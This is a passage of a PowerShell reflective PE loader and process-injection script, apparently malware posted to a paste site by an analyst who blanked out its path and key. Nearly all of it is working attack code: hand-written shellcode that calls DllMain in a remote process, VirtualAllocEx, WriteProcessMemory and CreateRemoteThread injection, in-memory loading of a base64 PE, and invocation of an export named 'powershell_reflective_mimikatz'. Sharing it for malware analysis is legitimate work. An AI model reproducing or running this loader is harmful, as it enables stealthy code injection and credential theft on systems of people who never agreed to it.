  1783. $DllMainPtr = Add-SignedIntAsUnsigned ($EffectivePEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
  1784. if ($PEInfo.PE64Bit -eq $true)
  1785. {
  1786. $CallDllMainSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x66, 0x83, 0xe4, 0x00, 0x48, 0xb9)
  1787. $CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xb8)
  1788. $CallDllMainSC3 = @(0xff, 0xd0, 0x48, 0x89, 0xdc, 0x5b, 0xc3)
  1789. }
  1790. else
  1791. {
  1792. $CallDllMainSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xf0, 0xb9)
  1793. $CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x50, 0x52, 0x51, 0xb8)
  1794. $CallDllMainSC3 = @(0xff, 0xd0, 0x89, 0xdc, 0x5b, 0xc3)
  1795. }
  1796. $SCLength = $CallDllMainSC1.Length + $CallDllMainSC2.Length + $CallDllMainSC3.Length + ($PtrSize * 2)
  1797. $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)
  1798. $SCPSMemOriginal = $SCPSMem
  1799. Write-BytesToMemory -Bytes $CallDllMainSC1 -MemoryAddress $SCPSMem
  1800. $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC1.Length)
  1801. [System.Runtime.InteropServices.Marshal]::StructureToPtr($EffectivePEHandle, $SCPSMem, $false)
  1802. $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
  1803. Write-BytesToMemory -Bytes $CallDllMainSC2 -MemoryAddress $SCPSMem
  1804. $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC2.Length)
  1805. [System.Runtime.InteropServices.Marshal]::StructureToPtr($DllMainPtr, $SCPSMem, $false)
  1806. $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)
  1807. Write-BytesToMemory -Bytes $CallDllMainSC3 -MemoryAddress $SCPSMem
  1808. $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC3.Length)
  1809. $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)
  1810. if ($RSCAddr -eq [IntPtr]::Zero)
  1811. {
  1812. Throw "Unable to allocate memory in the remote process for shellcode"
  1813. }
  1814. $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)
  1815. if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))
  1816. {
  1817. Throw "Unable to write shellcode to remote process memory."
  1818. }
  1819. $RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions
  1820. $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)
  1821. if ($Result -ne 0)
  1822. {
  1823. Throw "Call to CreateRemoteThread to call GetProcAddress failed."
  1824. }
  1825. $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null
  1826. }
  1827. }
  1828. elseif ($PEInfo.FileType -ieq "EXE")
  1829. {
  1830. [IntPtr]$ExeDoneBytePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(1)
  1831. [System.Runtime.InteropServices.Marshal]::WriteByte($ExeDoneBytePtr, 0, 0x00)
  1832. $OverwrittenMemInfo = Update-ExeFunctions -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -ExeArguments $ExeArgs -ExeDoneBytePtr $ExeDoneBytePtr
  1833. [IntPtr]$ExeMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)
  1834. $Win32Functions.CreateThread.Invoke([IntPtr]::Zero, [IntPtr]::Zero, $ExeMainPtr, [IntPtr]::Zero, ([UInt32]0), [Ref]([UInt32]0)) | Out-Null
  1835. while($true)
  1836. {
  1837. [Byte]$ThreadDone = [System.Runtime.InteropServices.Marshal]::ReadByte($ExeDoneBytePtr, 0)
  1838. if ($ThreadDone -eq 1)
  1839. {
  1840. Copy-ArrayOfMemAddresses -CopyInfo $OverwrittenMemInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants
  1841. break
  1842. }
  1843. else
  1844. {
  1845. Start-Sleep -Seconds 1
  1846. }
  1847. }
  1848. }
  1849. return @($PEInfo.PEHandle, $EffectivePEHandle)
  1850. }
  1851. Function Invoke-MemoryFreeLibrary
  1852. {
  1853. Param(
  1854. [Parameter(Position=0, Mandatory=$true)]
  1855. [IntPtr]
  1856. $PEHandle
  1857. )
  1858. $Win32Constants = Get-Win32Constants
  1859. $Win32Functions = Get-Win32Functions
  1860. $Win32Types = Get-Win32Types
  1861. $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants
  1862. if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0)
  1863. {
  1864. [IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress)
  1865. while ($true)
  1866. {
  1867. $ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)
  1868. if ($ImportDescriptor.Characteristics -eq 0 `
  1869. -and $ImportDescriptor.FirstThunk -eq 0 `
  1870. -and $ImportDescriptor.ForwarderChain -eq 0 `
  1871. -and $ImportDescriptor.Name -eq 0 `
  1872. -and $ImportDescriptor.TimeDateStamp -eq 0)
  1873. {
  1874. break
  1875. }
  1876. $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi((Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name)))
  1877. $ImportDllHandle = $Win32Functions.GetModuleHandle.Invoke($ImportDllPath)
  1878. if ($ImportDllHandle -eq $null)
  1879. {
  1880. Write-Warning "Error getting DLL handle in MemoryFreeLibrary, DLLName: $ImportDllPath. Continuing anyways" -WarningAction Continue
  1881. }
  1882. $Success = $Win32Functions.FreeLibrary.Invoke($ImportDllHandle)
  1883. if ($Success -eq $false)
  1884. {
  1885. Write-Warning "Unable to free library: $ImportDllPath. Continuing anyways." -WarningAction Continue
  1886. }
  1887. $ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))
  1888. }
  1889. }
  1890. $Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE)
  1891. if ($Success -eq $false)
  1892. {
  1893. Write-Warning "Unable to call VirtualFree on the PE's memory. Continuing anyways." -WarningAction Continue
  1894. }
  1895. }
  1896. Function Main
  1897. {
  1898. $Win32Functions = Get-Win32Functions
  1899. $Win32Types = Get-Win32Types
  1900. $Win32Constants =  Get-Win32Constants
  1901. $RemoteProcHandle = [IntPtr]::Zero
  1902. if (($ProcId -ne $null) -and ($ProcId -ne 0) -and ($ProcName -ne $null) -and ($ProcName -ne ""))
  1903. {
  1904. Throw "Can't supply a ProcId and ProcName, choose one or the other"
  1905. }
  1906. elseif ($ProcName -ne $null -and $ProcName -ne "")
  1907. {
  1908. $Processes = @(Get-Process -Name $ProcName -ErrorAction SilentlyContinue)
  1909. if ($Processes.Count -eq 0)
  1910. {
  1911. Throw "Can't find process $ProcName"
  1912. }
  1913. elseif ($Processes.Count -gt 1)
  1914. {
  1915. $ProcInfo = Get-Process | where { $_.Name -eq $ProcName } | Select-Object ProcessName, Id, SessionId
  1916. Write-Output $ProcInfo
  1917. Throw "More than one instance of $ProcName found, please specify the process ID to inject in to."
  1918. }
  1919. else
  1920. {
  1921. $ProcId = $Processes[0].ID
  1922. }
  1923. }
  1924. if (($ProcId -ne $null) -and ($ProcId -ne 0))
  1925. {
  1926. $RemoteProcHandle = $Win32Functions.OpenProcess.Invoke(0x001F0FFF, $false, $ProcId)
  1927. if ($RemoteProcHandle -eq [IntPtr]::Zero)
  1928. {
  1929. Throw "Couldn't obtain the handle for process ID: $ProcId"
  1930. }
  1931. }
  1932.         try
  1933.         {
  1934.             $Processors = Get-WmiObject -Class Win32_Processor
  1935.         }
  1936.         catch
  1937.         {
  1938.             throw ($_.Exception)
  1939.         }
  1940.         if ($Processors -is [array])
  1941.         {
  1942.             $Processor = $Processors[0]
  1943.         } else {
  1944.             $Processor = $Processors
  1945.         }
  1946.         if ( ( $Processor.AddressWidth) -ne (([System.IntPtr]::Size)*8) )
  1947.         {
  1948.             Write-Error "PowerShell architecture (32bit/64bit) doesn't match OS architecture. 64bit PS must be used on a 64bit OS." -ErrorAction Stop
  1949.         }
  1950.         if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 8)
  1951.         {
  1952.             [Byte[]]$PEBytes = [Byte[]][Convert]::FromBase64String($PEBytes64)
  1953.         }
  1954.         else
  1955.         {
  1956.             [Byte[]]$PEBytes = [Byte[]][Convert]::FromBase64String($PEBytes32)
  1957.         }
  1958.         $PEBytes[0] = 0
  1959.         $PEBytes[1] = 0
  1960. $PEHandle = [IntPtr]::Zero
  1961. if ($RemoteProcHandle -eq [IntPtr]::Zero)
  1962. {
  1963. $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs
  1964. }
  1965. else
  1966. {
  1967. $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle
  1968. }
  1969. if ($PELoadedInfo -eq [IntPtr]::Zero)
  1970. {
  1971. Throw "Unable to load PE, handle returned is NULL"
  1972. }
  1973. $PEHandle = $PELoadedInfo[0]
  1974. $RemotePEHandle = $PELoadedInfo[1]
  1975. $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants
  1976. if (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -eq [IntPtr]::Zero))
  1977. {
  1978.     [IntPtr]$WStringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "powershell_reflective_mimikatz"
  1979.     if ($WStringFuncAddr -eq [IntPtr]::Zero)
  1980.     {
  1981.     Throw "Couldn't find function address."
  1982.     }
  1983.     $WStringFuncDelegate = Get-DelegateType @([IntPtr]) ([IntPtr])
  1984.     $WStringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WStringFuncAddr, $WStringFuncDelegate)
  1985.                     $WStringInput = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArgs)
  1986.     [IntPtr]$OutputPtr = $WStringFunc.Invoke($WStringInput)
  1987.                     [System.Runtime.InteropServices.Marshal]::FreeHGlobal($WStringInput)
  1988.     if ($OutputPtr -eq [IntPtr]::Zero)
  1989.     {
  1990.      Throw "Unable to get output, Output Ptr is NULL"
  1991.     }
  1992.     else
  1993.     {
  1994.         $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($OutputPtr)
  1995.         Write-Output $Output
  1996.         $Win32Functions.LocalFree.Invoke($OutputPtr);
  1997.     }
  1998. }
  1999. elseif (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -ne [IntPtr]::Zero))
  2000. {
  2001. $VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "VoidFunc"
  2002. if (($VoidFuncAddr -eq $null) -or ($VoidFuncAddr -eq [IntPtr]::Zero))
  2003. {
  2004. Throw "VoidFunc couldn't be found in the DLL"
  2005. }
  2006. $VoidFuncAddr = Sub-SignedIntAsUnsigned $VoidFuncAddr $PEHandle
  2007. $VoidFuncAddr = Add-SignedIntAsUnsigned $VoidFuncAddr $RemotePEHandle
  2008. $RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $VoidFuncAddr -Win32Functions $Win32Functions
  2009. }
  2010. if ($RemoteProcHandle -eq [IntPtr]::Zero)
  2011. {
  2012. Invoke-MemoryFreeLibrary -PEHandle $PEHandle
  2013. }
  2014. else
  2015. {
  2016. $Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE)
  2017. if ($Success -eq $false)
  2018. {
  2019. Write-Warning "Unable to call VirtualFree on the PE's memory. Continuing anyways." -WarningAction Continue
  2020. }
  2021. }
  2022. }
  2023. Main
  2024. }
  2025. Function Main
  2026. {
  2027. if (($PSCmdlet.MyInvocation.BoundParameters["Debug"] -ne $null) -and $PSCmdlet.MyInvocation.BoundParameters["Debug"].IsPresent)
  2028. {
  2029. $DebugPreference  = "Continue"
  2030. }
  2031. $ExeArgs = ""
  2032. if ($versid -eq "bind")
  2033. {
  2034. $ExeArgs = "notepad.exe bind $idsid $rckey"
  2035. }
  2036. elseif ($versid -eq "atinmem")
  2037.  {
  2038. $ExeArgs = "notepad.exe $fpath $idsid $rckey"
  2039. }
  2040. else
  2041. {
  2042. }
  2043.     [System.IO.Directory]::SetCurrentDirectory($pwd)
  2044. $PEBytes64 = '' #replace64
  2045. $PEBytes32 = '' #replace32
  2046. if ($ComputerName -eq $null -or $ComputerName -imatch "^\s*$")
  2047. {
  2048. Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes64, $PEBytes32, "Void", 0, "", $ExeArgs)
  2049. }
  2050. else
  2051. {
  2052. Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes64, $PEBytes32, "Void", 0, "", $ExeArgs) -ComputerName $ComputerName
  2053. }
  2054. }
  2055. Main
  2056. }
  2057. get-fgruvers -versid atinmem  -fpath 'path discarded by mal analyst' -idsid 1215 -rckey 'key discarded by mal analyst'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement